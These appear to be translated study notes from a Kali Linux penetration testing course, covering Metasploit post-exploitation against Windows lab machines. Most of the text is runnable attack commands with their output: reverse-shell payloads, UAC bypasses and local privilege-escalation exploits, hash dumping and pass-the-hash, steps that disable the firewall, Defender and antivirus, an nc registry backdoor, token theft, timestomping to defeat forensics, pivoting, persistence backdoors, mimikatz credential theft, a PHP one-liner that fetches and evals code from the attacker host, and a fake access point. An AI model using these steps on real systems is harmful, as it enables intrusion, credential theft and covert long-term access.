This article records the detailed process of learning and using Kali Linux 2018.1 for penetration testing. It follows the course "Kali Linux Penetration Testing" from the Security Niu Classroom.
1. Preparations
Expanding the foothold after gaining control of the target system
- privilege escalation
- information gathering
- pivoting into the internal network
- persistent backdoor
Expanding the foothold from an existing session
- msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
Kali listens for the callback
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.128
msf exploit(multi/handler) > exploit -j
The Windows machine runs payload.exe
Kali receives a meterpreter session
msf exploit(multi/handler) > sessions
Active sessions
===============
  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN7-VM\John
2. Obtain system account permissions
getsystem fails: John is a local administrator, but under UAC the session runs with his filtered (medium-integrity) token, so every elevation technique is denied
meterpreter > getuid
Server username: WIN7-VM\John
meterpreter > load priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
Bypassing UAC
use exploit/windows/local/ask # pops a real UAC consent dialog on the victim's desktop; only works if the user clicks Yes
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set FILENAME win_update.exe
set SESSION 1
exploit
In the new (elevated) session: meterpreter > getsystem, then getuid should report NT AUTHORITY\SYSTEM
use exploit/windows/local/bypassuac # silent bypass, needs the user to be a member of the local Administrators group
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
show targets
exploit
use exploit/windows/local/bypassuac_injection # same idea, but the bypass DLL is injected in memory rather than dropped to disk
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
Exploit a local vulnerability to escalate directly to SYSTEM (no UAC interaction needed)
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_053_schlamperei set SESSION 1
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_081_track_popup_menu set SESSION 1 exploit
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ms13_097_ie_registry_symlink set SESSION 1 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 set SRVHOST 10.0.0.128 exploit
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ppr_flatten_rec set SESSION 1 exploit
Graphical payload (VNC session on the target's desktop)
set payload windows/vncinject/reverse_tcp
use exploit/windows/local/ppr_flatten_rec
set payload windows/vncinject/reverse_tcp
set SESSION 1
set LHOST 10.0.0.128
set ViewOnly false # allow keyboard and mouse input, not just viewing
exploit
Turning off UAC
Dump the hashes (requires SYSTEM)
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Note that aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (also what appears when LM storage is disabled) and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.
Try pass-the-hash with psexec
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
Error: Exploit failed [no-access]
Cause: John is a local administrator but not the built-in RID-500 account, and UAC's remote restrictions strip the administrator token from network logons of such accounts, so the SMB logon succeeds but creating the service is denied. UAC therefore has to be dealt with first, from the elevated session obtained above: LocalAccountTokenFilterPolicy=1 lifts the remote restriction, EnableLUA=0 disables UAC altogether (the original does both), and a reboot is required
sessions -i 2
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
shutdown -r -t 0
Then run psexec again
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
4. Basic operations
1. Turn off the firewall
Requires administrator or SYSTEM privileges
netsh advfirewall set allprofiles state on
netsh advfirewall set allprofiles state off
2. Stop Windows Defender
Look up the service name first (WinDefend), then stop the service
net stop windefend
3. BitLocker encryption
- manage-bde -status C: # is the volume encrypted?
- manage-bde -off C: # turn BitLocker off and start decrypting the volume
4. Turn off DEP (takes effect after a reboot)
- bcdedit.exe /set {current} nx AlwaysOff
5. Kill antivirus software
- run killav
- run post/windows/manage/killav
6. Enable Remote Desktop Services
# enable the service
run post/windows/manage/enable_rdp
# undo it with the cleanup resource file the module wrote to loot
run multi_console_command -rc /root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
# enable it with the getgui script instead
run getgui -e
run getgui -u yuanfh -p pass # add an RDP user
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc # cleanup script written by getgui
7. View the remote desktop
- screenshot
- load espia
- screengrab
5. Attacking the domain controller with tokens
Tokens
- A temporary token is bound to the account each time a user logs on
- The token is presented for authentication when resources are accessed, much like a web cookie
- Delegate tokens: interactive logon sessions
- Impersonate tokens: non-interactive logon sessions
- After the account logs off, its delegate token is reported as an impersonate token but keeps its rights until the host reboots
Incognito
- Originally a standalone tool, now integrated into meterpreter by Metasploit
- Needs no password, no cracking and no password hash: steal a token and pose as that user
- Especially suited to privilege escalation and lateral movement across many hosts in a domain
Build the domain environment
- DC + XP
load incognito
- list_tokens -u
- impersonate_token lab\\administrator # in meterpreter the backslash must be doubled
- The command above needs SYSTEM (getsystem) to read other users' tokens
- An ordinary local user therefore has to escalate locally first
- use exploit/windows/local/ms10_015_kitrap0d
- execute -f cmd.exe -i -t # -t: run the program under the currently impersonated token
- shell
8. Registry
The registry holds almost all of Windows' configuration parameters
- An improper modification can crash the system outright
- Make a full backup of the registry before changing it
- Some registry changes cannot be reverted
Common uses
- Modify or add startup (Run) entries
- Steal secrets stored in the registry
- Bypass file-based antivirus detection
Add an nc backdoor via a registry Run entry (meterpreter)
- meterpreter >
- upload /usr/share/windows-binaries/nc.exe C:\windows\system32
- reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
- reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
- reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc
Open the firewall port (meterpreter)
- meterpreter >
- execute -f cmd -i -H
- netsh firewall show opmode
- netsh firewall add portopening TCP 444 "test" ENABLE ALL # must match the port nc listens on (444); the legacy netsh firewall context is for XP/2003, newer systems use netsh advfirewall firewall add rule
- shutdown -r -f -t 0
- nc 10.0.0.132 444 # from Kali, after the reboot
Other registry keys
9. Packet capture
Packet capture (meterpreter)
- load sniffer
- sniffer_interfaces
- sniffer_start 2
- sniffer_dump 2 1.cap
- Captured packets are kept in a ring buffer in memory (50000 packets) and never written to the target's disk
- Meterpreter's own traffic is filtered out automatically, and the whole transfer back to Kali is SSL/TLS encrypted
Decoding
- use auxiliary/sniffer/psnuffle
- set PCAPFILE /root/1.cap
10. Search files
- search -f *.ini
- search -d "c:\documents and settings\administrator\desktop" -f *.docx
11. Cracking weak passwords
- John the Ripper cracks weak passwords
- use post/windows/gather/hashdump # needs a SYSTEM-level meterpreter session
- run # results are saved in the /tmp directory
- use auxiliary/analyze/jtr_crack_fast
- run
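What jtr_crack_fast does with the hashdump output above is worth seeing in the small. The block below is an added example for these notes (not Metasploit or John the Ripper code): it parses pwdump-format lines such as those in section 2, computes NT hashes (MD4 over the UTF-16LE password, written out in full because hashlib's md4 is missing on many OpenSSL 3 builds) and tests a tiny wordlist against them. The "Bob" line and the wordlist are constructed for the example.

```python
"""Offline check of hashdump output: parse pwdump-format lines and test a
wordlist against the NT hashes. Added example, not Metasploit or JtR code."""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" (also shown when LM storage is disabled)


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds of 16 steps over 512-bit blocks)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    i3 = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (i3, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rol((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, as stored in the SAM and printed by hashdump."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(line: str) -> dict:
    """user:rid:lm:nt::: -> dict, hashes lower-cased for comparison."""
    user, rid, lm, nt = line.split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def crack(lines, wordlist):
    """Return {user: password} for every account whose NT hash matches a candidate."""
    table = {nt_hash(w): w for w in wordlist}
    return {r["user"]: table[r["nt"]] for r in map(parse_pwdump, lines) if r["nt"] in table}


# The three lines from the hashdump in section 2 plus one constructed account (Bob).
SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "Bob:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
]

if __name__ == "__main__":
    print(crack(SAMPLE, ["", "password", "123456"]))
```

Running it shows all three original accounts resolving to the empty password and Bob to "password"; a real run feeds the loot file to John with a proper wordlist and rules instead of this three-word list.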
12. Erasing traces
- Accessing the file system leaves traces, and those traces are what forensics focuses on
- Penetration testers, like attackers, often want to destroy the traces of file-system access
The best way to avoid forensic detection is not to touch the file system at all
- This is meterpreter's built-in advantage (it lives entirely in memory)
MAC times (Modified / Accessed / Changed)
- ls -l --time=atime 1.txt (likewise --time=mtime / --time=ctime)
- stat 1.txt
- touch -d "2 days ago" 1.txt
- touch -t 1501010101 1.txt # sets atime and mtime to 2015-01-01 01:01; ctime cannot be set this way, the kernel updates it to "now", which itself betrays the change
MACE: the MFT entry timestamps (Modified, Accessed, Created, Entry modified)
- MFT: Master File Table of the NTFS file system
- The MFT holds one entry per file or directory; each entry is usually 1024 bytes (two 512-byte sectors)
- An entry contains a lot of information about the file: size, name, parent directory, location on disk, creation date
- For more detail, study file system forensic analysis
Timestomp (meterpreter)
- timestomp -v 1.txt # show the four MACE values
- timestomp 1.txt -f c:\autoexec.bat # copy all MACE values from autoexec.bat onto 1.txt
- -b blanks the MACE values so forensic tools display them as empty (the course found this option not working in this version); -r applies recursively to a directory; -m / -a / -c / -e set a single value, -z sets all four
- timestomp 2.txt -z "MM/DD/YYYY HH24:MI:SS"
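The MAC-time notes above turn on one detail that is easy to miss: touch and timestomp-style tools rewrite what they can reach, but the file system keeps its own record of when the metadata changed. The block below is an added example (not from the course) that backdates a scratch file the way `touch -t 1501010101` does, shows that ctime stays at "now", and applies the two checks a forensic script would run: a ctime far later than mtime, and timestamps ending in exactly .000000000, which second-granularity tools leave behind. The threshold values are illustrative.

```python
"""What touch -d / touch -t can and cannot change on a POSIX file system,
plus a simple tampering check. Added example for these notes."""
import os
import tempfile
from datetime import datetime, timezone

NS = 1_000_000_000


def mac_times_ns(path):
    """(mtime, atime, ctime) in nanoseconds: the M/A/C times the notes refer to."""
    st = os.stat(path)
    return st.st_mtime_ns, st.st_atime_ns, st.st_ctime_ns


def backdate(path, when: datetime):
    """Equivalent of `touch -d <when> path` (or touch -t YYMMDDhhmm): sets atime and
    mtime only. ctime cannot be set from userland; the kernel bumps it to "now"
    because the inode was modified, which is exactly the trace left behind."""
    ns = int(when.timestamp()) * NS
    os.utime(path, ns=(ns, ns))
    return mac_times_ns(path)


def looks_tampered(path, slack_s=2):
    """Flag a file whose ctime is well after its mtime (metadata touched long after the
    claimed last write) or whose M/A times are exact whole seconds."""
    m, a, c = mac_times_ns(path)
    whole_seconds = (m % NS == 0) and (a % NS == 0)
    ctime_gap = (c - m) > slack_s * NS
    return whole_seconds or ctime_gap


def demo():
    """Create a scratch file, backdate it like the notes do, and report what a checker sees."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    os.write(fd, b"evidence\n")
    os.close(fd)
    try:
        target = datetime(2015, 1, 1, 1, 1, tzinfo=timezone.utc)  # touch -t 1501010101 (UTC here)
        m, a, c = backdate(path, target)
        return {
            "mtime_set": m == int(target.timestamp()) * NS,   # touch did what was asked
            "ctime_moved_forward": c - m > 365 * 86400 * NS,  # but ctime stayed "now"
            "flagged": looks_tampered(path),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

On NTFS the equivalent tell-tale is the $FILE_NAME attribute, which timestomp's -z/-f only touch in $STANDARD_INFORMATION, which is why the notes point to file system forensic analysis for the rest.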
13. pivoting springboard / pivot / fulcrum
- Build the payload with msfvenom
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
Then obtain SYSTEM on that first host
Use the compromised host as a pivot into the internal network
- From the other internal hosts' point of view, all access comes from the pivot
run autoroute -s 1.1.1.0/24 # the target's internal segment, which has no route to the outside
Autoroute in a realistic scenario
- Use the Win7 host to attack the internal XP machine (compare XP with and without external access)
- Scan the internal network: use auxiliary/scanner/portscan/tcp
Port forwarding (portfwd) for pivoting
- Use the compromised host to forward ports between Kali and the target
- portfwd add -L LIP -l LPORT -r RIP -p RPORT
- portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
- portfwd list / delete / flush
use exploit/windows/smb/ms08_067_netapi # run through the forward: the local port must map to the target's port 445
- set RHOST 127.0.0.1
- set LHOST 2.1.1.10
- use exploit/multi/handler
- set ExitOnSession false
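To make the portfwd semantics concrete, here is an added example (not Metasploit code) of a minimal TCP relay with the meaning of `portfwd add -L LIP -l LPORT -r RIP -p RPORT`, run entirely on localhost: the "target" is a constructed echo service standing in for RIP:RPORT, this process plays the pivot, and `through_forward` is the attacker connecting to the local port. The point the notes make, that the internal host only ever sees the pivot's address, is visible in `portfwd_add`, where the pivot opens the connection to the target itself.

```python
"""Minimal TCP relay with portfwd semantics, exercised offline on localhost.
Added example for these notes; not meterpreter's portfwd implementation."""
import socket
import threading


def _pipe(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_echo_target():
    """Constructed stand-in for the internal host (RIP:RPORT); returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_pipe, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def portfwd_add(lhost, lport, rhost, rport):
    """Listen on lhost:lport and relay each connection to rhost:rport, as the pivot
    does for the attacker. Returns the bound local port (lport=0 picks a free one)."""
    lsock = socket.socket()
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((lhost, lport))
    lsock.listen()

    def accept_loop():
        while True:
            client, _ = lsock.accept()
            # The pivot opens this connection, so the target sees the pivot's address.
            remote = socket.create_connection((rhost, rport))
            threading.Thread(target=_pipe, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pipe, args=(remote, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock.getsockname()[1]


def through_forward(lport, payload: bytes) -> bytes:
    """The attacker's side: talk to 127.0.0.1:lport and get the remote service's reply."""
    with socket.create_connection(("127.0.0.1", lport), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    target_port = start_echo_target()
    local_port = portfwd_add("127.0.0.1", 0, "127.0.0.1", target_port)
    print(through_forward(local_port, b"hello via pivot"))
```

With ms08_067 this is why RHOST is 127.0.0.1: the exploit talks to the local end of the forward and the pivot carries the SMB traffic to the internal host's port 445.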
14. POST module
- meterpreter >
- run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
- run post/windows/gather/checkvm
- run post/windows/gather/credentials/credential_collector
- run post/windows/gather/enum_applications
- run post/windows/gather/enum_logged_on_users
- run post/windows/gather/enum_snmp
- run post/windows/manage/delete_user USERNAME=yuanfh
- run post/multi/recon/local_exploit_suggester
- run post/multi/gather/env
- run post/multi/gather/firefox_creds
- run post/multi/gather/ssh_creds
- run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
- run hostsedit -e 1.1.1.1,www.baidu.com
- migrate -N explorer.exe
- run [tab] [tab]
run winenum
Auto-run meterpreter scripts
- set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
- set InitialAutoRunScript checkvm
Automatically execute the post module
- set InitialAutoRunScript migrate -N explorer.exe
- set AutoRunScript post/windows/gather/dumplinks
15. Persistent backdoors
- A meterpreter obtained by exploiting a vulnerability lives only in memory; it is gone after a reboot
- Exploiting the same bug repeatedly may crash the service
A persistent backdoor keeps remote control even after the vulnerability is patched
meterpreter backdoor (metsvc)
- run metsvc -A # install the meterpreter service and connect to it automatically; -r removes it
- use exploit/multi/handler
- set PAYLOAD windows/metsvc_bind_tcp
- set LPORT 31337
- set RHOST 1.1.1.1 # bind payload: the target's address
persistence script
- run persistence -h
- run persistence -X -i 10 -p 4444 -r 10.0.0.128 # -X: start at boot (HKLM Run key); -i: reconnect interval in seconds; -p/-r: handler port and address
- run persistence -U -i 20 -p 4444 -r 10.0.0.128 # -U: start at user logon (HKCU Run key)
- run persistence -S -i 20 -p 4444 -r 10.0.0.128 # -S: install as a system service (needs SYSTEM)
16. mimikatz of msf extension usage
- hashdump reuses part of mimikatz's functionality
- getsystem
- load mimikatz
- wdigest, kerberos, msv, ssp, tspkg, livessp: the credential providers the extension can dump
- mimikatz_command -h
- mimikatz_command -f a::
- mimikatz_command -f samdump::hashes
- mimikatz_command -f handle::list
- mimikatz_command -f service::list
- mimikatz_command -f crypto::listProviders
- mimikatz_command -f winmine::infos # minesweeper game
17. Code Execution Vulnerabilities
PHP shell
- msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
- msf start listening
- Upload to web site and access via browser
web Delivery
- Exploit a code-execution vulnerability to make the target fetch and run a stager from the attacker's server
- use exploit/multi/script/web_delivery
- set target 1 # PHP
- run
- php -d allow_url_fopen=true -r "eval(file_get_contents('http://1.1.1.1/fTYWqmu'));" # the one-liner the module prints; run it on the target
18. RFI (remote file inclusion)
On the vulnerable server, RFI needs these php.ini settings:
- vi /etc/php5/cgi/php.ini
- allow_url_fopen = On
- allow_url_include = On
- use exploit/unix/webapp/php_include
- set RHOSTS 1.1.1.2
- set PATH /dvwa/vulnerabilities/fi/
- set PHPURI /?page=XXpathXX
- set HEADERS "Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
- set payload php/meterpreter/reverse_tcp
- set lhost 1.1.1.1
- exploit
19. Karmetasploit
- Fake AP, password sniffing, data capture, browser attacks
Resource file bundling many exploits: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
Install the remaining dependencies
- gem install activerecord sqlite3-ruby
Infrastructure installation and configuration
- apt-get install isc-dhcp-server
- cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
Fake AP
- airmon-ng start wlan0
- airbase-ng -P -C 30 -e "FREE" -v wlan0mon
- ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
- touch /var/lib/dhcp/dhcpd.leases
- dhcpd -cf /etc/dhcp/dhcpd.conf at0
Launch Karmetasploit
- msfconsole -q -r karma.rc_.txt
Let the victims keep browsing the Internet normally
vi karma.rc_.txt
File link: https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg Password: tpc0
- Remove the setg lines
- Add browser_autopwn2 and other modules
- Check for malware traffic: auxiliary/vsploit/malware/dns*
Relaunch Karmetasploit
- msfconsole -q -r karma.rc_.txt
Add routing and firewall rules (enable forwarding and NAT the victims' traffic out through eth0)
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE